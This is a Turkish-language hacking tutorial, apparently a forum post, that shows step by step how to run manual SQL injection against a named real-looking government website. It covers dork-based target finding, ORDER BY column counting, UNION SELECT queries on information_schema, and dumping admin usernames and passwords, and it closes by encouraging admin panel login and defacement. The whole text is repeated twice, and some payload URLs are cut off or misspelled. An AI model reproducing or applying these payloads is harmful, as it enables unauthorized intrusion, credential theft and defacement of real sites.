Selamün aleyküm bugün sizlere manuel olarak site hacklemeyi göstereceğim.
İlk olarak dorkla sitebuluyoruz veya hedef sitede açık taraması yapıyoruz.
Önemli Notlar:
-Sitenin url sindeki açığı belirlemek için sadece ' kullanmayın bazen vermiyor böyle yaptığınızda.
-' gibi karekterlere örnek olarak "a veya , gibi karekterlerde vardır.
Programlarla arasındaki fark nedir ? havji veya jsql kullananlar görmüştür.Bunun gibi kodlar geçiyor programlar sadece çok hızlı olarak yapıyor.
http://www.bpc.gov.bd/contactus.php?id=13'
http://www.bpc.gov.bd/contactus.php?id=13+order+by+By+
http://www.bpc.gov.bd/contactus.php?id=13+order+by+1,2,3,4,5,6,7,8,9 mesela hatamız 9
Hatalı sayfadan önceki sayfanın hatalı olup olmadığını buluyoruz taki hatasız gelene kadar.
http://www.bpc.gov.bd/contactus.php?id=-13+union+select+0,1,2,3,4,5,6,7,8 hatasız sayfanın öncesindeki sayfaya kadar ve id değerinin karşısına - koyuyoruz.Ben saten koydum 13 ün gerisine - ve diyelim 8. sayfada hata vermedi
Ardından rakam veriyor bu rakamı silip söyle yazıyoruz mesela rakam 1
http://www.bpc.gov.bd/contactus.php...2,3,4,5,6,7,8,9+from+informtion_schema.tables 1 in olduğu yeri silip yazdık.
Yazdıkdan sonra büyük ve küçük yazılar gelcek:
Küyük yazanlar infermation_schema
Küçük yazanlar ise bizim asıl databesemiz
ardından taplolara bakıp users veya admini seçiyoruz.
https://www.easycalculation.com/ascii-hex.php bu siteye gelip
tablo adını yapıstırıyoruz.
http://www.bpc.gov.bd/contactus.php...a.columns+where+tables_names=char(99,105,gibi sayılar veriyor ama boşluklu olarak) ve
ardından sitede çıkan char kodlarını parantezlerin içine koyuyoruz.(Boşluklar yerine virgül koyuyoruz)
http://www.bpc.gov.bd/contactus.php...a.columns+where+tables_names=char(99,105,...)
table yerine column yazdık.
Ardından karşımıza admin veya users içindeki columnlar çıkıyor bize lazım olanlar username password dur.
http://www.bpc.gov.bd/contactus.php...me,0x3a,password),2,3,4,5,6,7,8,9+from+buraya bilgileri çektiğimiz dosya adını yazıyoruz biz admin veya user demiştik
column_nameyi silip username,0x3a,password yazdık
http://www.bpc.gov.bd/contactus.php...ame,0x3a,password),2,3,4,5,6,7,8,9+from+admin diyelim biz buna enter dedik
ve karşımıza bilgileri geliyor ondan sonra admin panelini bulup giriyoruz ve artık site sizin elinizde index atması size kalmıs.
İlk olarak dorkla sitebuluyoruz veya hedef sitede açık taraması yapıyoruz.
Önemli Notlar:
-Sitenin url sindeki açığı belirlemek için sadece ' kullanmayın bazen vermiyor böyle yaptığınızda.
-' gibi karekterlere örnek olarak "a veya , gibi karekterlerde vardır.
Programlarla arasındaki fark nedir ? havji veya jsql kullananlar görmüştür.Bunun gibi kodlar geçiyor programlar sadece çok hızlı olarak yapıyor.
http://www.bpc.gov.bd/contactus.php?id=13'
http://www.bpc.gov.bd/contactus.php?id=13+order+by+By+
http://www.bpc.gov.bd/contactus.php?id=13+order+by+1,2,3,4,5,6,7,8,9 mesela hatamız 9
Hatalı sayfadan önceki sayfanın hatalı olup olmadığını buluyoruz taki hatasız gelene kadar.
http://www.bpc.gov.bd/contactus.php?id=-13+union+select+0,1,2,3,4,5,6,7,8 hatasız sayfanın öncesindeki sayfaya kadar ve id değerinin karşısına - koyuyoruz.Ben saten koydum 13 ün gerisine - ve diyelim 8. sayfada hata vermedi
Ardından rakam veriyor bu rakamı silip söyle yazıyoruz mesela rakam 1
http://www.bpc.gov.bd/contactus.php...2,3,4,5,6,7,8,9+from+informtion_schema.tables 1 in olduğu yeri silip yazdık.
Yazdıkdan sonra büyük ve küçük yazılar gelcek:
Küyük yazanlar infermation_schema
Küçük yazanlar ise bizim asıl databesemiz
ardından taplolara bakıp users veya admini seçiyoruz.
https://www.easycalculation.com/ascii-hex.php bu siteye gelip
tablo adını yapıstırıyoruz.
http://www.bpc.gov.bd/contactus.php...a.columns+where+tables_names=char(99,105,gibi sayılar veriyor ama boşluklu olarak) ve
ardından sitede çıkan char kodlarını parantezlerin içine koyuyoruz.(Boşluklar yerine virgül koyuyoruz)
http://www.bpc.gov.bd/contactus.php...a.columns+where+tables_names=char(99,105,...)
table yerine column yazdık.
Ardından karşımıza admin veya users içindeki columnlar çıkıyor bize lazım olanlar username password dur.
http://www.bpc.gov.bd/contactus.php...me,0x3a,password),2,3,4,5,6,7,8,9+from+buraya bilgileri çektiğimiz dosya adını yazıyoruz biz admin veya user demiştik
column_nameyi silip username,0x3a,password yazdık
http://www.bpc.gov.bd/contactus.php...ame,0x3a,password),2,3,4,5,6,7,8,9+from+admin diyelim biz buna enter dedik
ve karşımıza bilgileri geliyor ondan sonra admin panelini bulup giriyoruz ve artık site sizin elinizde index atması size kalmıs.
